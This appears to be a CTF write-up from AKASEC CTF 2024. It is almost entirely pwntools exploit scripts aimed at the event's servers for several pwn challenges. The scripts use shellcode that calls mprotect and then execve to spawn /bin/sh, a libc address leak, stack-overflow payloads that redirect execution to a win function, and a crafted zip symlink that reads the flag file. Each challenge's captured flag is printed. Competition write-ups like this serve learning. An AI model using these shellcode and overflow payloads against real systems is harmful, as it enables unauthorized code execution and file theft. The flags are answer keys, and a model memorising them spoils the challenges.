HackMD- hlaan·Last edited by hlaan on Jun 20, 2024Linked with GitHubContributed by
(writeup) AKASEC CTF 2024
good-trip
#!/usr/bin/python3
from pwn import *
exe = ELF('./good_trip', checksec=False)
context.binary = exe
info = lambda msg: log.info(msg)
sla = lambda msg, data: p.sendlineafter(msg, data)
sa = lambda msg, data: p.sendafter(msg, data)
sl = lambda data: p.sendline(data)
s = lambda data: p.send(data)
sln = lambda msg, num: sla(msg, str(num).encode())
sn = lambda msg, num: sa(msg, str(num).encode())
def GDB():
if not args.REMOTE:
gdb.attach(p, gdbscript='''
b*exec+64
c
''')
input()
if args.REMOTE:
p = remote('172.210.129.230',1351)
else:
p = process(exe.path)
GDB()
sla(b'size >> ',str(0x1000))
pl = asm(f"""
mov rsp, 0x404a00
mov rdi, 0x1337131000
mov rsi, 0x1000
mov rdx, 7
mov rcx, {exe.plt.mprotect}
call rcx
xor rdi, rdi
mov rsi, 0x1337131048
mov rdx, 0x100
mov rcx, {exe.plt.read}
call rcx
nop
nop
nop
""",arch='amd64')
pl2 = asm(f"""
mov rbx, 29400045130965551
push rbx
mov rdi, rsp
xor rsi, rsi
xor rdx, rdx
mov rax, 0x3b
syscall
""",arch='amd64')
payload = pl
sa(b'>> ',payload)
sleep(2)
s(pl2)
p.interactive()
#AKASEC{y34h_You_C4N7_PRO73C7_5om37hIn9_YoU_doN7_h4V3}
AKASEC{y34h_You_C4N7_PRO73C7_5om37hIn9_YoU_doN7_h4V3}
bad-trip
#!/usr/bin/python3
from pwn import *
exe = ELF('./bad_trip_patched', checksec=False)
libc = ELF('./libc.so.6',checksec=False)
context.binary = exe
info = lambda msg: log.info(msg)
sla = lambda msg, data: p.sendlineafter(msg, data)
sa = lambda msg, data: p.sendafter(msg, data)
sl = lambda data: p.sendline(data)
s = lambda data: p.send(data)
sln = lambda msg, num: sla(msg, str(num).encode())
sn = lambda msg, num: sa(msg, str(num).encode())
def GDB():
if not args.REMOTE:
gdb.attach(p, gdbscript='''
b*exec+71
c
''')
input()
if args.REMOTE:
p = remote('172.210.129.230',1352)
else:
p = process(exe.path)
# GDB()
p.recvuntil(b'with ')
leak = int(p.recvuntil(b'\n',drop=True),16)
info("leak: " + hex(leak))
libc_leak = 0x7fcb00000000 | leak
libc.address = libc_leak - libc.sym.puts
info("libc leak: " + hex(libc_leak))
info("libc base: " + hex(libc.address))
pl = asm(f"""
mov rdi, [fs:0x300]
add rdi, 120
mov rdi, [rdi]
sub rdi, 163210
add rdi,0x111709
mov rsp, 0x6969696a10
mov rcx, rdi
mov rbx, 29400045130965551
push rbx
mov rdi, rsp
xor rsi, rsi
xor rdx, rdx
mov rax, 0x3b
call rcx
""",arch='amd64')
payload = pl
sa(b'>> ',payload)
p.interactive()
#AKASEC{pr3f37CH3M_Li8C_4Ddr35532}
AKASEC{pr3f37CH3M_Li8C_4Ddr35532}
the_absolute_horror_of_the_trip
- tương tự bài bad-trip
- script không khác gì =)))
AKASEC{NoW_You_r34lly_H4V3_7o_pr3F37cH3M_li8C_4DDR5}
yapping
#!/usr/bin/python3
from pwn import *
exe = ELF('challenge', checksec=False)
context.binary = exe
info = lambda msg: log.info(msg)
sla = lambda msg, data: p.sendlineafter(msg, data)
sa = lambda msg, data: p.sendafter(msg, data)
sl = lambda data: p.sendline(data)
s = lambda data: p.send(data)
sln = lambda msg, num: sla(msg, str(num).encode())
sn = lambda msg, num: sa(msg, str(num).encode())
def GDB():
if not args.REMOTE:
gdb.attach(p, gdbscript='''
b* 0x401256
c
''')
input()
if args.REMOTE:
p = remote('20.80.240.190',14124)
else:
p = process(exe.path)
GDB()
payload = b'a'*108 + p32(0x70) + p64(0x4011f4)
s(payload)
payload = b"a"*88 + flat(0x4011f1, exe.sym.user+0x70) + b'a'*4 + p32(0x70) + p64(exe.sym.win)
s(payload)
payload = b'a'*108 + p32(0x70) + p64(0x4011f4)
s(payload)
payload = b'admin\0\0\0'.ljust(108) + p32(0x70) + p64(exe.sym.win)
s(payload)
p.interactive()
#AKASEC{y4pp1n6_15_50m371m35_u53full_9b9b3d9}
AKASEC{y4pp1n6_15_50m371m35_u53full_9b9b3d9}
zop
#!/usr/bin/python3
from pwn import *
import os
import base64
sla = lambda delim, data: p.sendlineafter(delim, data)
sa = lambda delim, data: p.sendafter(delim, data)
s = lambda data: p.send(data)
sl = lambda data: p.sendline(data)
r = lambda nbytes: p.recv(nbytes)
ru = lambda data: p.recvuntil(data)
rl = lambda : p.recvline()
elf = context.binary = ELF('zop')
def int_from_bytes(bytes):
return int.from_bytes(bytes, byteorder='little')
def GDB(proc):
gdb.attach(p, gdbscript='''
b extract_zip
b parse_lfh
c
''')
#context.log_level = 'debug'
file = b'AAAAA'*0x20
f = open('content/a', 'wb')
f.write(file)
f.close()
f = open('content/b', 'wb')
f.write(file)
f.close()
os.system("zip a.zip content/a")
f = open('a.zip', 'rb')
content = f.read()
f.close()
print(content)
file_name = b'hahaha\x00'
extra_feild_len = b'hihi\x00'
data_ = b'/chal/flag.txt\x00'
content = p32(67324752) # signature
content += p16(0) # version
content += p16(0) # flag
content += p16(0) # compression
content += p16(0) # mod time
content += p16(0) # mod_date
content += p32(0) # checksum
content += p32(0) # compressed size
content += p32(len(data_)) # uncompressed size
content += p16(len(file_name)) # fname_len
content += p16(len(extra_feild_len)) # extra_feild_len
content += file_name
content += extra_feild_len
content += data_
extra = b'aaa\x00'
comm = b'aaa\x00'
symbol = b'/chal/flag.txt\x00'
content += p32(33639248) # signature
content += p16(0) #version
content += p16(0) # version_need
content += p16(0) #flag
content += p16(0) # compress
content += p16(0) # mod_time
content += p16(0) # mod_date
content += p32(0) # checksum
content += p32(0) # compmress size
content += p32(len(symbol)) # uncompress size
content += p16(len(file_name)) # fname_len
content += p16(len(extra)) # extra_feild_len
content += p16(len(comm)) # file_comm_len
content += p16(0) # disk_start
content += p16(0) # internal_attrs
content += p32(0xa0000000) # external_attrs
content += p32(0) # local_header
content += file_name + extra + comm
payload = base64.b64encode(content)
#p = remote('0', 1349)
p = remote('172.210.129.230', 1349)
#p = process()
#GDB(p)
sla(b'file', payload)
p.interactive()
#AKASEC{I7_wa5_700_0BVi0u5_ri9H7?}
AKASEC{I7_wa5_700_0BVi0u5_ri9H7?}
